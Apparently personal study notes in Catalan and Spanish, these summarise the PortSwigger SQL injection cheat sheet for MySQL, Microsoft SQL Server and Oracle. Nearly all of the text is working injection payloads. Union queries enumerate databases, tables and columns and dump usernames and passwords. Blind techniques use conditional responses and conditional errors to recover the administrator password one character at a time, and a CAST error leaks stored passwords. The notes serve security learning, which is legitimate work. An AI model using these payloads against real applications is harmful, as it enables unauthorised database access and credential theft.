sql injection

portswigger sql injection cheat sheet

MYSQL or MICROSOFT-----------------------------------------------------------------------------------------------------------------------
coment: -- -
concat()
grup_concat(users, ':'(0x3a) ,password) concatenar respostas en una sola sortida de info
users|| ':' ||password

'or 1=1-- - (resultat tru, dump information)
'union ( uneix els resultats en la columna indicada)
'union select NULL,@@version-- - (verure la versio de la database amb mysql)

listar db: 'union select schema_name,(2/NULL) from information_schema.schemata-- -

		'UNION SELECT table_name, NULL FROM information_schema.tables--


listar tables: 'UNION SELECT table_name, NULL FROM information_schema.tables where table_schema = '(la db)'-- -


		'UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='(table name)'-- -

listar columnas: 'union select column_name,NULL from information_schema.columns where table_schema = '(la db)' and table_name = '(tabla)'-- -

listar data: 'union select password,username from users-- -

ORACLE------------------------------------------------------------------------------------------------------------------------------

'union select NULL,NULL from dual-- - (has de apuntar una base de datos per saber les columnes que te)
'union select banner,NULL from v$version-- - (per veure la versio de la database)

'union select table_name, NULL from all_tables-- - (dump de informacio de totes les taules)
'union select owner, NULL from all_tables-- - (veus qui son els owners de les taules) --> 'union select table_name, NULL from all_tables where owner = 'alex'-- -
'union select NULL, column_name from all_tab_columns where table_name = 'users....'-- -
'union select NULL, users||':'||passworsd from usernames-- -


BLIND SQL INJECTION---------------------------------------------------------------------------------------------------------------------

*MYSQL/MICROSOFT-------------------conditional response

'and (select substring(password,1,1) from users where username ='administrator')='a

*ORACLE -------------------conditional error
'||(select '' from dual)||'

'||(select case when (1=1) then to_char(1/0) else '' end from users where username='administrator' and length(password)>= 20)||'

si lenght de la password es correcta et donara un 500 internal error
si es correcta la lenght de la password et donara un 200 OK
perque el que pasa que primer executa from 'from users where username='administrator' and length(password)>= 20' i si es correcte aquesta consulta pasa al 1=1, que com aixo es true et da el to_char(1/0) que es syntax error, per tant et dona el 500 internal error

'||(select case when (1=1) then to_char(1/0) else '' end from users where username='administrator' and length(password)>= 20)||'

aqui fem el mateix, pero en comptes de 1=1 probem el primer caracter de la contrasenya, per tant, quan encertem el primer caracter de la contrasenya sortira el 500 internal error, i quan no el 200 OK

mysql---------------------------conditional visible error

'and 1=CAST((SELECT password FROM users LIMIT 1) AS int)-- -

cast converteix en int


